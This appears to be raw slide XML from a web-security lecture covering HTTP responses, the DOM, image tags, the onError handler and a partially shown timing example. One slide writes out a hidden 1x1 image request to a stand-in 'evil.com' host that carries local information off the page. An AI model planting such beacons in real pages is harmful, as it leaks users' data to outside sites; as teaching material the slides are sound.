                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;HTML&gt; Some data... blah, blah, blah &lt;/HTML&gt;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Response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2301875" y="1619251"/>
            <a:ext cx="16573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" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTTP version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27653" name="Line 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3063875" y="1943100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4121150" y="1619251"/>
            <a:ext cx="14795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" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Status code</a:t>
            </a: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5761037" y="1619251"/>
            <a:ext cx="18224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" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reason phrase</a:t>
            </a:r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 flipH="1">
            <a:off x="4054475" y="1943100"/>
            <a:ext cx="685800" cy="661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 flipH="1">
            <a:off x="4587875" y="1943100"/>
            <a:ext cx="1676400" cy="738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9007475" y="1695451"/>
            <a:ext cx="10858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" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Headers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27659" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="8093075" y="2019300"/>
            <a:ext cx="1371600" cy="1042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9723437" y="3671888"/>
            <a:ext cx="6794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" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27661" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="8574087" y="4052888"/>
            <a:ext cx="145415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676401" y="5772150"/>
            <a:ext cx="9268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/>
              <a:t>Cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27663" name="Freeform 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1868488" y="4400550"/>
            <a:ext cx="434975" cy="1460500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 169607 w 435078"/>
              <a:gd name="T1" fmla="*/ 1460090 h 1460090"/>
              <a:gd name="T2" fmla="*/ 36872 w 435078"/>
              <a:gd name="T3" fmla="*/ 589936 h 1460090"/>
              <a:gd name="T4" fmla="*/ 66368 w 435078"/>
              <a:gd name="T5" fmla="*/ 117987 h 1460090"/>
              <a:gd name="T6" fmla="*/ 435078 w 435078"/>
              <a:gd name="T7" fmla="*/ 0 h 1460090"/>
              <a:gd name="T8" fmla="*/ 0 60000 65536"/>
              <a:gd name="T9" fmla="*/ 0 60000 65536"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 w 435078"/>
              <a:gd name="T13" fmla="*/ 0 h 1460090"/>
              <a:gd name="T14" fmla="*/ 435078 w 435078"/>
              <a:gd name="T15" fmla="*/ 1460090 h 14600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5078" h="1460090">
                <a:moveTo>
                  <a:pt x="169607" y="1460090"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="111843" y="1136855"/>
                  <a:pt x="54079" y="813620"/>
                  <a:pt x="36872" y="589936"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19665" y="366252"/>
                  <a:pt x="0" y="216310"/>
                  <a:pt x="66368" y="117987"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="132736" y="19664"/>
                  <a:pt x="283907" y="9832"/>
                  <a:pt x="43507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hangingPunct="0"/>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRP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71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Content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9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Rendering and events</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51203" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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Basic browser execution model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Each browser window or frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Loads content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Renders it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Processes HTML and scripts to display page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May involve images, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>subframes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Responds to events</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Events can be</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User actions: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OnClick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OnMouseover</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rendering: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OnLoad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>OnBeforeUnload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Timing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(),  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>clearTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()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90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48200" y="5459086"/>
            <a:ext cx="594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2"/>
              </a:rPr>
              <a:t>http://www.w3schools.com/js/js_output.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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38401" y="1676401"/>
            <a:ext cx="5571141" cy="313932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&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br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&lt;h1&gt;My First Web Page&lt;/h1&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;p&gt;My first paragraph.&lt;/p&gt;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&lt;button </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(5 + 6)"&gt;Try it&lt;/button&gt;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&lt;/body&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/html&gt;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739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3" b="6005"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1973323" y="841075"/>
            <a:ext cx="7370522" cy="513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18671" y="209490"/>
            <a:ext cx="545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http://phet.colorado.edu/en/simulations/category/html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07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04800"/>
            <a:ext cx="8229600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Document Object Model (DOM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133734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133600" y="1524000"/>
            <a:ext cx="85344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Object-oriented interface used to read and write docs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web page in HTML is structured data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DOM provides representation of this hierarchy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869406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Properties:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.alinkColor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, document.URL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.forms</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[ ], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.links</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[ ], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.anchors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[ ]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869406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Methods:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.referrer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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smtClean="0"/>
              <a:t>Includes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Browser Object Model (BOM)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window, document, frames[], history, location, navigator (type and version of browser)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0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48200" y="5924916"/>
            <a:ext cx="594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2"/>
              </a:rPr>
              <a:t>http://www.w3schools.com/js/js_output.asp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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38401" y="1676401"/>
            <a:ext cx="5396927" cy="424731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&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br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&lt;h1&gt;My First Web Page&lt;/h1&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;p&gt;My First Paragraph&lt;/p&gt;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&lt;p id="demo"&gt;&lt;/p&gt;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&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>("demo").</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = 5 + 6;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/script&gt;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&lt;/body&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/html&gt;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8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/>
              <a:t>Changing HTML using Script, DOM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256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/>
              <a:t>Some possibilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>createElement(elementName)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>createTextNode(text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>appendChild(newChild)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>removeChild(node)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>Example: Add a new list item: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2667000" y="4114800"/>
            <a:ext cx="5943600" cy="1981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spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> list = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('t1')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/>
              <a:t>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newitem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>')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/>
              <a:t>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newtext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.createTextNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(text)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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>list.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>newitem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>newitem.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>newtext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)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7162800" y="1447800"/>
            <a:ext cx="2514600" cy="1447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 id="t1"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; Item 1 &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>li</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr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278564" y="1447800"/>
            <a:ext cx="7360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869406"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML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55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Image Tags</a:t>
            </a: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61600" y="6616700"/>
            <a:ext cx="355600" cy="2413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E06E595C-B8A9-4129-BDA4-5CF617B3E06C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43013" name="Picture 4" descr="beach sunse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4114801"/>
            <a:ext cx="252730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581400" y="5029201"/>
            <a:ext cx="33528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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Displays this nice picture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Security issues?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3601" y="1600201"/>
            <a:ext cx="8251939" cy="1643527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lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt;p&gt;  … &lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pP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=“http://example.com/sunset.gif” height="50" width="100"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/html&gt;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76400" y="152400"/>
            <a:ext cx="23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web functionality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19353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 tag security issues</a:t>
            </a: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61600" y="6616700"/>
            <a:ext cx="355600" cy="2413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F68522F2-BA83-4287-A1B3-FDFCCF02D90D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44036" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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dirty="0" smtClean="0"/>
              <a:t>Communicate with other sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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=“http://evil.com/pass-local-information.jpg?extra_information”&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hide resulting image </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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=“ … ” height=“1" width=“1"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spoof other sites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Add logos that fool a user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl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32773" name="TextBox 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="4600758"/>
            <a:ext cx="7315200" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Important Point: A web page can send information to any site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152400"/>
            <a:ext cx="2321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consequences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14601" y="5134158"/>
            <a:ext cx="476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Q: what threat model are we talking about here?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62966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304801"/>
            <a:ext cx="9257919" cy="586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112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 onError</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52227" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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Basic function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Triggered when error occurs loading a document or an image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example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>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Runs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> handler if image does not exist and cannot load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90800" y="3495676"/>
            <a:ext cx="7467600" cy="9239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0" lvl="1">
              <a:defRPr/>
            </a:pP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="image.gif" </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="alert('The image could not be loaded.')“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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1" y="5281885"/>
            <a:ext cx="49655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lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://www.w3schools.com/jsref/jsref_onError.asp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152400"/>
            <a:ext cx="23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web functionality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23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 timing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53251" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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Sample code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r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>When response header indicates that page is not an image, the browser stops and notifies JavaScript via the onerror handler. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr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362200" y="2316162"/>
            <a:ext cx="7467600" cy="31702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0" lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;html&gt;&lt;body&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> id="test" style="display: none"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/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test = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(’test’);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/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start = new Date();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>test.onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = function() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> end = new Date();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
